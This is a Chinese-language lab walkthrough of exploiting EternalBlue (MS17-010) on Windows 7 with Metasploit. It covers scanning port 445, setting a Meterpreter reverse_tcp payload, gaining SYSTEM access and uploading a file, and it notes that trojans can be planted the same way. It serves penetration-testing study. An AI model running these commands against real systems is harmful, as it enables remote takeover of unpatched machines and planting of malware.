# 利用 msf 渗透攻击 win7(永恒之蓝漏洞 ms17-010)
# 前言
永恒之蓝是指 2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含 “永恒之蓝” 工具,“永恒之蓝” 利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造 “永恒之蓝” 制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
存在漏洞的主机,只需要开放 445 端口即可被攻击,获取系统最高权限
# 环境
kali ip:192.168.232.129
windows7 ip:192.168.232.131
# 工具
Metasploit Framework (MSF) 是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit 可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以 “可以黑掉整个宇宙” 之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中,改成了用 Ruby 语言编写的了。在 kali 中,自带了 Metasploit 工具。
# ms17-010 漏洞复现
1. 安装 win7 并查看本机 ip
kali 利用 nmap 扫描 win7ip
发现开启了 445 端口,利用该端口进行攻击
2. 启动 msf 进行漏洞探测
#利用命令 | |
msfconsole #进入 msf | |
search ms17-010 #查找 msf17-010 漏洞模块 |
利用 use [对应的模块序号] 命令即可查看对应漏洞模块
为了使用 scanner
模块,这里我们输入 use 3
接着输入 info
命令来查看 ms17-010 漏洞信息
接下来使用 scanner
模块检测主机是否存在漏洞
输入命令 show options
在上面的图里可以看到 Required
为是否需要参数, yes
表示需要参数,若改选项对应参数为空则需要我们来输入参数
发现 RHOST
参数对应为空,其参数是被攻击主机的 IP,需要我们输入
输入命令 set rhosts 192.168.232.131
再次输入 show options
, 可以看到已经设置好了 RHOSTS
使用 run
命令进行扫描攻击,运行结果显示可能会遭受 ms17-010
攻击
3. 漏洞利用
回到开始选择漏洞模块的地方
输入 use 0
来选择 永恒之蓝
输入 set payload windows/x64/meterpreter/reverse_tcp
来设置 payload 的连接方式,使我们的 win7 主动发起连接,通过这种方式拿到权限
接下来需要设置我们的攻击 ip,按顺序输入 show options
和 set rhosts 192.168.232.131
接下来使用 run
命令即可执行攻击
出现返回的 meterpreter
时我们就得到了 win7 的 system 权限
【Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传 / 下载文件、创建持久后门等。】
这里进行文件上传的演示
在 kali 中创建一个文件(cumt.txt), 编辑内容
在 meterpreter
会话下输入命令 upload cumt.txt c://
, 将文件上传到 win7 主机的 C 盘下
查看 win7 主机,发现文件夹中多了一个 cumt.txt 文件,内容确实是我在 kali 中写入的相同
通过这种方式我们也可以在对应主机里写入木马并上传进行利用
到此永恒之蓝漏洞就复现完成了
参考:
https://zhuanlan.zhihu.com/p/453081910
https://blog.csdn.net/qq_44159028/article/details/104044002
https://blog.csdn.net/ElsonHY/article/details/109939420
漏洞原理:
https://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772